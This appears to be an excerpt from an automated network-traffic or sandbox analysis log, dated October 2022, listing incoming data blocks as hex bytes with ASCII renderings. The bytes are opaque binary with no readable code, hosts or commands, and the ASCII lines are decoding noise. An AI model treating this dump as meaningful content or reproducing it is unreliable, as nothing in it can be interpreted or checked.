                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12476INData Raw: 41 54 2d c6 9a 1e 42 bc 14 0e 9f 41 e8 de 25 d0 3f 22 50 c1 7d fd e7 7d 71 f8 ee 81 b4 e6 9a b0 15 9d 83 88 43 99 02 97 26 aa 76 63 4d bc 1c ac 18 c1 fb 95 25 d0 3f 22 50 c9 96 55 f8 19 9a 0a 67 71 c2 07 63 37 7e 4b a1 0a 4b ea a4 25 1a 41 2d 3d 23 d0 3f 22 50 d1 02 0b f6 a7 0e 3f 3f 84 b4 fa 70 49 ea 7b 8c 48 bc 2c 77 9a c1 ca 8c 20 d0 3f 22 50 cd 9f c0 4e c2 93 56 f2 71 4b bb 68 4d ea 92 61 e3 0b 61 55 fe 9e c1 1a d2 10 8f fe ea fa 28 09 4f b6 23 d8 43 25 c9 f2 0e d6 86 03 19 b0 ac 9b e2 5d 06 a7 f4 43 24 70 aa b7 20 6b 9b a5 b2 2d a1 f4 c3 cf 85 55 6c 48 d5 7e c6 ce ec 6f 3e 22 4a 71 fd 51 96 24 f1 19 27 42 0b d0 eb 84 55 5a e3 bf c3 10 ba 17 e9 e2 80 2c 79 fc 2e 0b ac 01 d2 2a 14 90 3e 22 4a 69 73 d3 f7 8d 7f 78 06 5e 0b f6 0f 8c 55 e0 6c 48 b5 fb fa
                                                                                                                                                                                                                                    Data Ascii: AT-BA%?"P}}qC&vcM%?"PUgqc7~KK%A-=#?"P??pI{H,w ?"PNVqKhMaaU(O#C%]C$p k-UlH~o>"JqQ$'BUZ,y.*>"Jisx^UlH
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12477INData Raw: 99 78 d3 ff 11 99 cb 39 03 ed 66 08 ed 6e 16 99 0c 72 b6 1e 99 f8 e1 a5 e6 66 c0 0a 96 e1 66 40 69 56 e5 66 21 98 68 16 99 fa 63 b4 bf ca ba e1 88 61 46 6b 93 66 36 0b c2 26 ce a7 84 9d ef ac b2 ed ea 12 d5 8b ed ef f9 d3 5a 89 ee fc aa 14 40 37 1f 8d 54 56 60 0a c7 ce 68 04 00 16 68 74 1b e4 97 ae ad 5d f4 53 1a e6 d8 f1 e3 7d 5d 23 02 f4 7d 76 6d 10 ee c0 1f 1a ed 9f f1 1f 1f 06 d1 28 7b 1e 03 e0 6e b2 c7 e0 97 0e a4 90 f5 25 fc 9a f4 ff fc 92 86 eb 1b 75 5c 5e fe 1b c0 64 2c 69 08 d9 2a 85 82 b1 c0 52 43 bd fc d2 93 c1 cd 16 93 14 41 d2 9f aa 5a 83 6a 4a fa 6d 3a 34 aa 49 ae 05 c9 a5 86 64 0b b5 aa 7e 32 64 14 82 aa e9 1b 70 9a e6 3c 2c 60 1e df 74 76 7d db 8e 0c b0 42 7e 14 cd 32 32 70 95 4a b2 2d 95 a4 04 70 95 50 cc 33 c9 cb f4 2f f0 f6 36 0f 68 3a
                                                                                                                                                                                                                                    Data Ascii: x9fnrff@iVf!hcaFkf6&Z@7TV`hht]S}]#}vm({n%u\^d,i*RCAZjJm:4Id~2dp<,`tv}B~22pJ-pP3/6h:
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12479INData Raw: 2b ac 61 de 36 54 5b ab d0 4a af 13 fd bf eb 23 4f 26 c0 8f 1b 5b f3 f7 9f 3f 8a bb ad 82 e2 93 c3 6b bd 97 b1 02 e9 cd e9 18 85 69 d2 d0 f9 cb ab 6a d5 21 fc 12 34 e5 6a 3f 2d c9 56 05 f5 23 b5 3d c5 a3 4c 14 f9 01 5d 2b 3f d3 8e e4 70 ff 19 5d e7 e5 65 b9 f1 bf f8 1a 77 11 e0 e2 15 cc 2e 1c 7d 7e fc 1b cc a4 ff be 99 e7 6f 3e 22 50 09 65 89 dc fb 39 1a b7 82 bf 01 e0 c1 d3 fe 84 eb e8 30 fe 21 46 f8 f2 82 37 f9 35 31 b7 f9 f7 e6 be 13 65 9f ac 9b 2b fa 01 48 1e 4a 55 6e dc 6c 30 49 43 62 c8 d7 2f f6 07 c8 0a e6 fd 17 26 6c 51 33 ec 0f 5c 06 0a 91 31 81 12 cc ea 88 3c 8b 4a 67 3b 03 0e 08 f0 cc a7 92 60 4a 21 9f 0d fe 2a 54 fe a2 91 5e b6 84 be bc 60 82 63 d8 09 79 ca be 11 02 a9 58 92 df 40 06 ee ce 38 f5 fb 16 04 99 71 08 d8 ea 66 71 da 5a e0 66 3a 28
                                                                                                                                                                                                                                    Data Ascii: +a6T[J#O&[?kij!4j?-V#=L]+?p]ew.}~o>"Pe90!F751e+HJUnl0ICb/&lQ3\1<Jg;`J!*T^`cyX@8qfqZf:(
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12480INData Raw: c0 b1 14 1a f8 95 71 b3 f9 bc be 59 7c ba c5 15 df ec f3 16 3b 53 2a 17 82 44 ed ec 84 c5 06 4e ff c3 a5 b0 2c a0 97 c7 23 2f c0 c5 a0 5b db 32 09 d6 07 13 ff 8c aa 27 20 e7 5d 60 dd 32 8e 5f 2e 60 55 6d 5c 0b eb 55 ce ff 47 4a ca 40 c1 92 67 2b a0 7a 24 eb 5c d5 43 46 93 20 45 ea b4 e4 21 a2 9b c1 90 ff ff ff 1b d2 66 0d 60 ab 17 6b 33 c9 65 bc de 87 eb 23 9b 7e e9 ef f8 9f 84 06 a0 2c 4e 94 e9 05 40 74 89 e8 ad 27 54 db 08 a5 52 f4 ae cc a9 f2 4b 94 23 be 68 2e 17 2f fe ff ff cb 5f 1c d4 1f ab e0 39 2d e0 0c de 3d d9 72 40 dd 8d b1 ac 46 9a 2c 01 00 00 00 c6 ab de df cf 75 be e3 5a c4 6a 39 00 a4 92 d1 f1 76 83 ed 80 01 2e d0 8c 2c fe ff ff ff 5a 99 5c 21 5c 83 6a df 11 0c 46 07 b1 3b c0 bb ab f6 19 b8 41 d4 cd ff 31 ca 41 32 cd 2a cc 87 72 c6 ee 78 d3
                                                                                                                                                                                                                                    Data Ascii: qY|;S*DN,#/[2' ]`2_.`Um\UGJ@g+z$\CF E!f`k3e#~,N@t'TRK#h./_9-=r@F,uZj9v.,Z\!\jF;A1A2*rx
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12484INData Raw: 29 30 cc dd 17 d5 17 e9 83 5f d0 3f 86 99 2a 24 b8 69 88 bb 25 80 76 99 7d da 17 d4 27 78 22 68 f6 39 38 d8 07 59 68 48 d2 9f 05 27 9a c0 c7 4d 4a e9 39 56 c8 0f d7 79 08 72 08 e1 f5 17 3a 80 31 48 ed 03 60 17 95 18 cf 7d 0a e8 86 fd 07 fe 1d 56 ef 60 81 63 b0 16 49 d7 c3 5c 1d 0f d0 23 91 72 8a 0a d9 ad 69 63 24 98 ca 72 2f 85 00 df 54 ac 3f 03 00 00 00 5f 31 72 da 7b 50 e1 25 75 12 42 82 f6 b9 a4 06 1a db 6d e9 f0 a1 6e 60 e1 08 a4 c3 4f b9 26 71 31 b2 bd 29 43 02 f8 12 40 3c 07 80 45 65 dd 99 40 43 f6 88 7f 02 00 00 00 ba b8 7e d3 96 ef 0e be 31 2a 43 da 07 e8 ae d4 69 c9 90 c6 2f 00 00 00 00 00 6c 11 98 fc e6 a3 e8 56 17 3f 8c bb b7 45 87 54 d2 10 db 63 8d 00 c8 f5 d0 ff ff ff ff ff 88 d4 29 60 c0 fd 3e 75 93 39 ba 75 ad 88 2b 98 6d 65 b6 aa 00 e3 80
                                                                                                                                                                                                                                    Data Ascii: )0_?*$i%v}'x"h98YhH'MJ9Vyr:1H`}V`cI\#ric$r/T?_1r{P%uBmn`O&q1)C@<Ee@C~1*Ci/lV?ETc)`>u9u+me
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12488INData Raw: 53 64 03 53 92 a3 0a 27 24 43 a7 c0 cd 2c ac 80 30 ec f4 80 fe 4e 72 dd d2 06 f3 30 89 31 c4 a1 56 02 af 92 d8 24 c8 64 b9 b1 fc 4a 95 fb fe 7c e3 1d a0 af 12 f5 14 d9 f1 32 db 5d ae 65 42 25 cf d1 64 a8 53 6f 18 50 ef 82 35 21 c6 66 68 e7 7f 8d 61 e3 52 86 6b 50 84 c3 76 38 04 93 6d 39 9a c8 e5 49 ba 2d 7b eb 00 29 ea 7e ab 33 03 5d d3 bb 73 9d 80 14 0f 2a 6c c4 e6 2e ac 9f 9e 1f ff 5e 5b 2f d0 84 6d 8e f1 40 f3 db bd d9 11 f3 4c d4 78 4a b5 d7 3b d8 65 94 f9 29 65 19 08 f6 42 ef e0 7c 06 52 87 61 7a da db 5b 89 40 2b 37 d1 6a 0c d4 c9 54 42 30 47 77 6c 3c 34 30 d2 ea be 94 67 30 89 7e f1 eb 9a f7 98 9f 3f 14 b9 87 38 00 3f de 52 32 39 a3 65 09 f2 8b b1 3d 19 1d c7 a6 e8 6e a4 87 83 9b b1 fc 16 15 52 be 8b 1f 76 fa 39 da bd 7c ab da a7 5c f5 4a d5 32 43
                                                                                                                                                                                                                                    Data Ascii: SdS'$C,0Nr01V$dJ|2]eB%dSoP5!fhaRkPv8m9I-{)~3]s*l.^[/m@LxJ;e)eB|Raz[@+7jTB0Gwl<40g0~?8?R29e=nRv9|\J2C
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12489INData Raw: c0 90 f0 03 42 9c 93 3f e2 4c 12 c8 b8 91 7a 1a 5f c9 5e 60 c2 22 b3 ed 38 4d 11 f4 09 45 3a cb 4e ea 50 62 f5 a9 89 2f 77 1c 84 c4 4e dc ab b3 7c 19 29 06 dd 9f 14 44 83 07 df 27 1b b7 cf cf b0 38 3d ed 8b 7a 83 1b 06 05 40 54 77 43 d7 f4 34 47 b7 8c 3c 7d 9a 93 ee f9 03 3a 0e c5 9b 79 45 c1 c1 30 c8 b7 e8 b3 e4 e5 b3 c7 20 90 74 6d e1 7b 90 72 6c bd 43 79 5e cb 31 c0 6a 36 d3 c5 1d 44 76 b9 80 61 fc 07 95 b1 55 97 96 1d af e3 41 2a 6c 9d 32 12 21 52 e6 de 6f 00 6c 36 14 a0 b6 21 e9 30 cd f0 76 45 07 54 b2 82 83 8b 66 df a8 31 0c 43 f1 b3 ff af d9 3b ff d2 93 ce 7f 8e 3a 4b df 96 36 fe 7c 0f 0a c2 2b 97 1c 71 ab 8e 1c 95 9e e6 bd 4a 66 e0 2f 09 ab 65 57 b6 1a 0b c2 32 5a 93 3c 24 27 c0 90 37 74 40 d8 17 af f5 a9 4b c2 7b ab 2c 01 a3 1e c1 f9 45 36 af b9
                                                                                                                                                                                                                                    Data Ascii: B?Lz_^`"8ME:NPb/wN|)D'8=z@TwC4G<}:yE0 tm{rlCy^1j6DvaUA*l2!Rol6!0vETf1C;:K6|+qJf/eW2Z<$'7t@K{,E6
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12493INData Raw: 96 6e 94 2e 9d e9 5a e3 2b c3 29 ac c9 ec 60 d6 31 dd e5 3f 16 74 ad e1 39 56 0a da 79 9c e9 b0 e8 0f 65 d6 63 e3 c3 37 16 52 c4 f6 92 a9 68 cd cc a8 f9 e8 96 7b 33 00 21 41 ec 28 57 3d f4 50 91 f4 31 c8 23 ad c7 69 55 39 c7 a0 6a 1b c4 89 5c 58 0c ed f4 91 59 9a 4c 2c 10 b6 92 52 12 80 4e 8d 2b 02 87 b4 94 2a e0 bd db aa dc d6 12 a5 71 5f 19 d3 e1 c4 a8 6e 28 55 f8 db 52 23 ed 65 c1 38 a4 86 2b 3c 76 b0 94 3c 15 0b dd dd aa b4 d3 14 42 a2 aa ed 74 9a bd d3 fd 53 64 45 38 c4 80 21 bd 69 2a 78 f6 78 3b 00 00 00 b0 55 a4 07 84 2e 61 fb a2 95 bf 2a 84 84 01 00 00 a0 35 ce ff 3b 67 85 2d f9 3b 2a 3c aa f9 3b 81 1b ca f3 3b c1 9f 26 09 c4 27 45 00 f5 3b 62 6c 28 09 c4 ac f6 ff 0f c4 ad 47 c6 0e c4 49 0f f8 0c c4 bb b1 d9 f0 3b 37 8d 86 f3 3b 03 19 8d 0b c4 b6
                                                                                                                                                                                                                                    Data Ascii: n.Z+)`1?t9Vyec7Rh{3!A(W=P1#iU9j\XYL,RN+*q_n(UR#e8+<v<BtSdE8!i*xx;U.a*5;g-;*<;;&'E;bl(GI;7;
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12497INData Raw: 97 fe ff ff 1f 0d cc 24 40 bb fc a0 c8 bf 15 95 21 de 92 28 5d 2f 9c ea dd c3 bf fe ff ff ff fb 0c da bf ea fb 8f dd 01 6c 26 27 40 0f bc ad 7e 3e da c9 74 ba 6f 72 25 40 01 00 00 e0 45 6c 52 ed f0 7f 31 a1 b3 03 99 d1 75 df bf 3a 6a f5 d2 bf 19 8f f9 2a 86 18 b8 2e 40 25 83 81 bd 63 74 d0 12 95 bd 6b d3 bd 60 0c d0 bf 16 91 3b a7 9c 96 7b c0 a5 86 30 dc bf fe ff ff 7f 4e cb c4 7e 44 33 3c 25 40 eb b2 94 d9 29 74 2b b9 5d 5b 9d d0 bf 01 00 00 80 62 12 dc bf 19 3c ae 21 c9 77 f0 11 05 2d 66 ff 64 f5 3c 05 d7 ea 9b ba 21 04 d3 bf 0d c9 be 0c 37 b7 c6 3c db 00 a7 4a e0 ab 59 28 40 75 6d 46 c1 f6 3a 00 df bf 7b 10 f3 11 e3 4a 5d 26 40 2a d0 0f 20 40 65 9b 93 fb 06 f7 3a 97 be f9 2a d0 bf 77 45 06 4e a0 87 44 d9 bf 01 00 00 e0 d1 ed d1 bf 9a df 2a da bf a2 ea
                                                                                                                                                                                                                                    Data Ascii: $@!(]/l&'@~>tor%@ElR1u:j*.@%ctk`;{0N~D3<%@)t+][b<!w-fd<!7<JY(@umF:{J]&@* @e:*wEND*
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12502INData Raw: e2 93 fe ae b3 c2 89 f9 b2 cd b7 c2 27 00 c7 f2 a0 b1 69 dd 5c 0a af e4 6c b0 77 52 e4 a0 c9 f0 cd a3 d8 29 a3 cf a3 a7 0e 64 08 2b c1 e6 90 1b ad 97 ab 04 d3 bf 89 1b 4c 8e 6e c0 80 cb 9e 47 18 a7 af 2f f6 3e 1b fb 1f 1c 55 e2 85 bc ec a7 f4 19 37 c6 be a0 82 67 9b d5 9d 2d f4 98 ca a4 7c b8 a9 7f 6b 97 a8 c2 bf 16 14 26 51 9f cf be 8c ad 77 06 40 bc d6 dd 8d bc 3a 4f 07 9e bf bd 7c fd d8 fd fb 5d ba f7 53 a0 49 6c 89 39 92 97 60 8a 82 12 57 cc 46 c9 a9 c0 18 5b 70 73 c5 94 fe 3d 38 09 40 ec 85 1e 9e 8d 90 25 25 00 bd d6 dd 8a 0b 86 63 39 d0 79 1b c6 17 5b 1a 8f 7d d0 48 dc b5 cd c4 b1 db ff 54 28 74 06 47 35 a9 48 65 1d ac c2 24 23 72 52 f3 ff 81 23 00 ab d7 8b f9 37 f1 51 a4 d8 98 c8 95 97 30 12 22 84 20 30 d2 6d 77 91 09 d7 47 4a fa b9 4e 2a 70 9b 17
                                                                                                                                                                                                                                    Data Ascii: 'i\lwR)d+LnG/>U7g-|k&Qw@:O|]SIl9`WF[ps=8@%%c9y[}HT(tG5He$#rR#7Q0" 0mwGJN*p
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12506INData Raw: 06 72 1c 43 96 68 bb c5 a0 99 30 ad 92 b5 e3 ea 93 f6 bf e2 9c 8f e9 5b ab 82 d6 43 4d 01 00 00 00 6f 18 8c 8c f2 7d 7e 45 4c 28 eb 7d 68 57 0b c0 4e 1b a8 10 99 a4 6e 7d 09 8b b0 d2 61 7c 72 48 2f 8e 01 1a ee 3a 68 16 36 01 99 7c a5 25 f9 66 94 3e 16 fe 66 4c 45 d6 fa 66 65 3a 09 0b 99 3b 94 04 04 99 d4 fa 7c 04 99 78 01 b2 ea 66 48 c3 30 e0 66 d3 21 cc 1c 99 40 45 a1 e7 66 7c e2 79 ef 66 b8 81 6a 17 99 08 82 59 10 99 d0 d9 99 14 99 c1 fe 46 e5 66 6f e0 4b ea 66 c8 a6 33 ea 66 1c be d1 16 99 dc da b4 bf 4a 2f e0 94 7f 54 e9 e9 6b 57 76 e6 26 3a 1e 5b e7 b0 d8 b2 13 d9 07 09 83 5e f4 5b 7b 30 e6 26 2b b5 e0 36 03 0b fb 5b eb 26 5c c5 14 8c e7 01 16 4d e6 26 e8 a6 9d d2 0a a7 b8 04 13 d9 25 c6 fe f5 26 16 32 97 13 43 d0 36 7f 64 e7 95 99 fe c5 17 9a 27 bc
                                                                                                                                                                                                                                    Data Ascii: rCh0[CMo}~EL(}hWNn}a|rH/:h6|%f>fLEfe:;|xfH0f!@Ef|yfjYFfoKf3fJ/TkWv&:[^[{0&+6[&\M&%&2C6d'
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12510INData Raw: 33 b8 7d f0 61 70 d3 fe ff ff 8d 85 1f e5 de 83 aa 33 cb 7f d0 b9 96 32 0c 88 c5 26 9b fb af 1c b8 57 79 32 40 6f 28 9e cf 32 00 e2 91 ce e3 60 70 d3 01 00 00 62 45 b5 24 90 43 99 8b cd 1f 2f 6c 3a 08 fc 6a e0 75 3a c0 65 60 4a db c7 66 45 9f cd 7f 01 52 b0 88 cf 64 1d cb 2a 60 d2 71 e6 f9 9d 77 4a 32 dd df 69 6f 95 02 ca 17 0a 2b 00 30 80 ae fd 41 93 de 62 d3 01 00 00 80 75 be 2d 20 a8 14 e5 d6 df 17 7a a6 d1 1f 6c 34 1b dc 5f a8 dd d3 2b 60 7d 15 1d 28 c0 03 2e f8 21 60 67 58 af d6 3f f7 12 d1 d2 5f f4 9f df d4 bf b7 40 35 2c 00 cc c5 0e d1 df 68 ea b6 2a 20 0d 54 f5 2d e0 ac c2 48 20 a0 90 f3 80 d7 9f c1 93 4e d4 3f 1d 08 ab dd 9f d9 de fc 2a c0 39 32 c3 0b c5 39 7a 02 b8 e0 cf 9b fd 17 82 11 9e 05 68 c0 7f de ff 07 1f ce ae f5 9f a3 19 7c e7 c7 73 17
                                                                                                                                                                                                                                    Data Ascii: 3}ap32&Wy2@o(2`pbE$C/l:ju:e`JfERd*`qwJ2io+0Abu- zl4_+`}(.!`gX?_@5,h* T-H N?*929zh|s
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12514INData Raw: 92 7c 13 76 7f cf 03 6f 6e e0 15 93 9e 97 2e 04 cc a2 8e c7 1a b8 5f 06 f9 e1 4a 8c 0e ea 47 2d 64 b2 c4 e1 9b 66 e0 ac a7 ce 85 d2 5b 1b 12 b8 38 10 b0 9e 35 c5 a5 05 45 ea 0e c0 b5 fc fd 8a d5 76 07 bc 55 38 d4 fd 33 f8 39 97 10 9d fe 7a 42 a0 b3 16 38 12 12 91 ad 3e f8 a4 c1 1c 84 7f 1f 22 c2 07 2f 71 73 51 3a 0b fe e1 c5 71 1e 70 c1 07 46 ad e3 34 f8 9a 84 d2 e2 d8 44 fd b6 e3 dd ed 13 7f 3a 3e aa 33 69 6d 2b e8 f1 57 09 21 29 57 4b 16 c5 00 49 92 50 d5 2c 75 d9 d5 d0 b4 1a 62 2e 23 a3 ca 49 60 31 79 57 20 17 cc d0 4e 20 12 27 7e 87 44 13 22 ff 51 8d ca c1 b8 21 9b 9d d4 b2 bb a5 f9 de 5b f5 b9 e6 3a 82 cb 60 a0 2a ce d7 2b 25 2f e6 c8 f1 cb ca 47 fd b5 38 f0 a9 ba f6 66 a0 2b 38 fc 66 2b f9 c4 00 99 40 a5 a9 fb 66 bc 22 71 f3 66 c0 19 62 0b 99 28 82
                                                                                                                                                                                                                                    Data Ascii: |von._JG-df[85EvU839zB8>"/qsQ:qpF4D:>3im+W!)WKIP,ub.#I`1yW N '~D"Q![:`*+%/G8f+8f+@f"qfb(
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12518INData Raw: d9 ed 18 99 48 d6 35 10 99 ec d5 26 e8 66 d4 5e 15 ef 66 4c 45 d5 eb 66 65 3a 0a 1a 99 73 dc 07 15 99 64 6a 7f 15 99 00 b9 b1 fb 66 c8 63 33 f1 66 eb 39 cf 0d 99 b0 b9 ee 04 99 da e5 a6 bf 4a 2f e0 94 7a 63 f3 bc 03 d9 e8 f2 26 78 82 24 01 9f ff b8 0f d9 e0 6e 09 eb ef 61 25 e0 f4 26 15 1c 2e 3a fd 95 2a 92 0e d9 3d 64 fc 69 02 f0 05 f0 0b d9 e3 9d c0 33 e0 f4 00 bb fb 26 c0 41 a6 04 f9 f6 f4 4f 05 f9 4c 60 a1 46 97 b1 9a 09 d9 0e 9d 8d f6 86 a7 b3 d2 57 4d b9 3d f6 26 06 c1 19 09 79 b7 9d fe 04 f9 13 20 08 1b d9 48 1c 3c 85 63 d6 16 ed 26 39 b1 79 75 e0 ef a9 ef 26 60 8e 7f 16 93 13 59 15 d9 9d 5c 26 2e 3d 2a 57 81 9b 1d f1 07 fd 40 71 c8 5a c4 c3 7f b7 ff 4b 3b 71 8b 5a 63 7b f9 7d 8d 3a 3c 99 3a 23 b5 63 50 48 16 dc 14 ad 89 e7 dc 11 46 47 be b8 10 43
                                                                                                                                                                                                                                    Data Ascii: H5&f^fLEfe:sdjfc3f9J/zc&x$na%&.:*=di3&AOL`FWM=&y H<c&9yu&`Y\&.=*W@qZK;qZc{}:<:#cPHFGC
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12521INData Raw: f1 ac fc 12 07 89 31 e6 78 c0 d2 7f 1b 36 e4 60 68 32 4b 29 89 fe 93 93 c0 e6 f6 8d ad 50 5e e9 f4 bd 97 14 f0 f5 5f 9d 0a 08 e0 7b 6e 0c 7d 1f 84 02 3b 31 51 ab 72 49 c9 e0 7b 8a fd d7 68 5e cb f8 d1 18 84 06 51 84 d8 6d 18 e3 7f 14 84 dc cd c1 84 61 7b 74 c4 1a 84 25 63 f5 e7 79 dc 3a b8 15 2b f1 4b 7b 01 00 00 00 6d 44 9e 55 30 b8 78 3b 00 00 00 00 cf d9 37 0f 41 7e e0 66 28 bb 93 29 00 58 da c6 30 05 e3 75 78 13 40 fe cf 2b 4f da c4 6e bb d7 35 85 c5 ff 75 85 22 0f c7 42 86 e1 7b 1c 34 5a 62 f3 0c a1 0e 84 98 22 33 0d d0 57 dc 61 83 c5 ae d7 dd b2 bc c7 03 f6 7b 4e d5 12 f3 f2 d6 e7 0b 84 b7 ed de 31 46 08 30 60 85 9a 77 67 df f0 f9 20 c3 0e d7 5d 08 c6 ff 2a 90 2c 8f a6 7f eb 13 84 43 3b 62 a4 04 04 67 13 84 7a 47 3a a4 5b 4b 06 0c d6 a5 62 3a 18 65
                                                                                                                                                                                                                                    Data Ascii: 1x6`h2K)P^_{n};1QrI{h^Qma{t%cy:+K{mDU0x;7A~f()X0ux@+On5u"B{4Zb"3Wa{N1F0`wg ]*,C;bgzG:[Kb:e
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12525INData Raw: f6 70 12 02 89 d8 16 a5 cc ea 41 26 f2 f5 6f 9f fb e6 33 5c 16 46 7f b5 b5 9d 79 fa f7 96 ea dd 66 9f 28 2f e5 f9 01 18 62 84 56 6e 5c e8 fe 4a 43 fa 34 19 2c f6 ef 3c c4 e5 fd 5b 02 a2 52 33 28 8b 76 d6 40 5e 90 b9 6a 58 cb 99 6a ab fa 80 cc aa 0c 81 d4 e7 82 c3 d2 dd 4c 04 53 db f6 62 88 95 f7 c2 1d 36 53 34 dd 5f 95 40 ab b7 ad b6 b3 81 f2 58 b5 7b c3 9f 3d 45 d1 9e 18 4d ca a9 1e 0d 5f 69 ab 1c 56 0a a9 0c a7 ca 21 81 c3 dc 6b 8a 07 53 7d 08 a4 8b 95 09 ec db 35 53 fa a3 99 96 40 95 e9 6b b5 b3 df 42 65 05 40 54 b6 d7 c1 c1 85 ec e4 d0 01 00 00 56 54 bc 2d a0 d1 75 23 d6 df 8c d3 60 d1 1f dd bd dd dc 5f fd a4 15 2b 60 04 6c db 28 c0 6e 47 3e 21 60 ae b1 69 d6 3f a0 63 17 d2 5f 5f 26 19 d4 bf 0e f9 f3 2c 00 7f 74 c8 d1 df cd 4b 70 2a 20 b4 d5 33 2d e0
                                                                                                                                                                                                                                    Data Ascii: pA&o3\Fyf(/bVn\JC4,<[R3(v@^jXjLSb6S4_@X{=EM_iV!kS}5S@kBe@TVT-u#`_+`l(nG>!`i?c__&,tKp* 3-
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12529INData Raw: 06 2b 40 2b d8 ec d3 ff ba 85 d7 2e 20 7e d2 6f d5 df 35 6c 2c d2 1f 34 7a 91 df 5f 4c 1b 59 28 60 89 fb 97 2b c0 f3 16 9a 3f c5 54 93 25 a1 5b 7f 11 9d 5b 6e 8e 96 02 1c 9f 66 c5 00 1c 89 f9 02 c7 94 97 49 f6 d4 12 39 f9 40 17 39 36 0d 15 ca ee 5d ad 0f cd f2 a2 d0 44 13 40 a0 95 26 85 29 5a cb 8c 9b a4 9b ff f1 66 a4 ce 1e 76 f9 e3 4f de 25 fb e3 b1 a9 e2 3c 6b a6 e6 09 9e cc 1a 01 59 00 42 2a 14 8f db c8 c9 4c de 90 10 40 43 2a 14 fd 08 22 e4 bf eb 7a 9b 5c f8 58 fb 7b 85 e1 ca 1a 16 0e 22 45 8a b4 28 7f a8 8e cd 14 62 40 44 5e 61 9b 6d 95 bc 92 c2 7c 7f 73 68 60 ec bf 55 28 74 03 57 63 39 50 c7 34 70 e2 50 16 13 26 87 0c 8a a6 22 00 42 2a b4 e7 c3 1e a6 c7 e1 58 a8 b9 4d fa 52 29 40 43 28 7c 77 88 3f f6 81 53 4f 43 9a bf 6d 70 c5 2f 48 52 57 64 b1 f9
                                                                                                                                                                                                                                    Data Ascii: +@+. ~o5l,4z_LY(`+?T%[[nfI9@96]D@&)ZfvO%<kYB*L@C*"z\X{"E(b@D^am|sh`U(tWc9P4pP&"B*XMR)@C(|w?SOCmp/HRWd
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12534INData Raw: bf 16 fc d9 d5 bf 7a 17 3c 2e 40 0f 56 4d de bf b6 91 1c 2c 40 78 51 cd 22 40 04 98 ea 2a 40 12 15 42 c9 bf 3c 56 68 dd bf 70 71 93 2e 40 21 5c 13 d2 bf c1 99 2a d1 bf 6a 50 1c dd bf 56 b3 f9 26 40 ab 72 88 d6 bf 12 fd d9 24 40 d4 e1 5a 43 40 0d e5 6c da 6e a5 38 b8 5b 6e 16 d7 48 59 0c c7 55 66 f5 65 b9 5c 9a b9 bb 02 93 f5 0f e6 0a d9 f2 9a c8 84 e1 9d 15 ee af 00 45 21 6c a3 6e 2a e8 99 e8 a5 e0 17 05 f5 09 ad 01 5f 65 53 42 a4 3e 26 bc b2 a6 55 2f 3e 9c 0a bd 41 37 60 46 4b 82 f8 0f f0 4e 92 b2 08 65 98 9c 8a 40 9b cc b2 2c 40 fe ff ff bf 9f 4f df bf b9 3d 97 24 40 17 40 3f c7 bf 09 93 15 d3 bf d5 4c ee 20 40 1c a9 6e dc bf d4 14 57 df bf 07 cd 61 d3 bf eb 1e 84 28 40 06 77 f5 d8 bf 57 d0 a4 2a 40 19 80 75 24 40 d5 49 52 2c 40 e3 94 fa cf bf 5d 27 d0
                                                                                                                                                                                                                                    Data Ascii: z<.@VM,@xQ"@*@B<Vhpq.@!\*jPV&@r$@ZC@ln8[nHYUfe\E!ln*_eSB>&U/>A7`FKNe@,@O=$@@?L @nWa(@wW*@u$@IR,@]'
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12538INData Raw: c3 b7 df f5 2d f5 5c 20 97 af 57 5b 20 04 ca 0e 47 20 30 15 67 4a 20 df e0 9d b9 df 0b 9b f8 49 20 01 d7 06 bd df 4c 24 e0 bd df ce be c6 bb df 44 72 2c c9 df 78 88 55 40 20 73 bb 63 ab df e1 69 c1 ac df 33 c4 98 b0 df 0f 43 43 b3 df 3c 51 35 0f 27 ad 87 a5 65 7b ef 5e c6 82 bd fe 1f 40 71 c0 15 d3 c1 81 fa a8 65 9a 19 a2 b1 7b 9a 26 9b 7f 6d 80 46 d6 5a 67 4d 20 27 ba 58 2c e6 23 a9 05 97 31 89 44 e7 21 b0 48 03 41 56 9a 9a b1 98 35 7d c2 f8 d9 b3 8e 86 23 15 32 7e e2 e6 a3 69 e6 ad af bd 69 d9 a5 79 ab 73 b9 90 33 5d 38 cb fa ed 2f 50 01 a4 82 08 33 b3 17 97 4f 6b ef 2b 97 71 8e 7c 80 df 65 f5 19 70 20 df 91 e7 84 df 0a 62 01 84 df 98 e0 27 82 df 5a 0c cd f0 df 77 5e b4 79 20 c4 bd 82 92 df f7 57 20 95 df ec 2a 79 89 df a1 5d 10 84 df 17 e8 ea 77 20 92
                                                                                                                                                                                                                                    Data Ascii: -\ W[ G 0gJ I L$Dr,xU@ sci3CC<Q5'e{^@qe{&mFZgM 'X,#1D!HAV5}#2~iiys3]8/P3Ok+q|ep b'Zw^y W *y]w
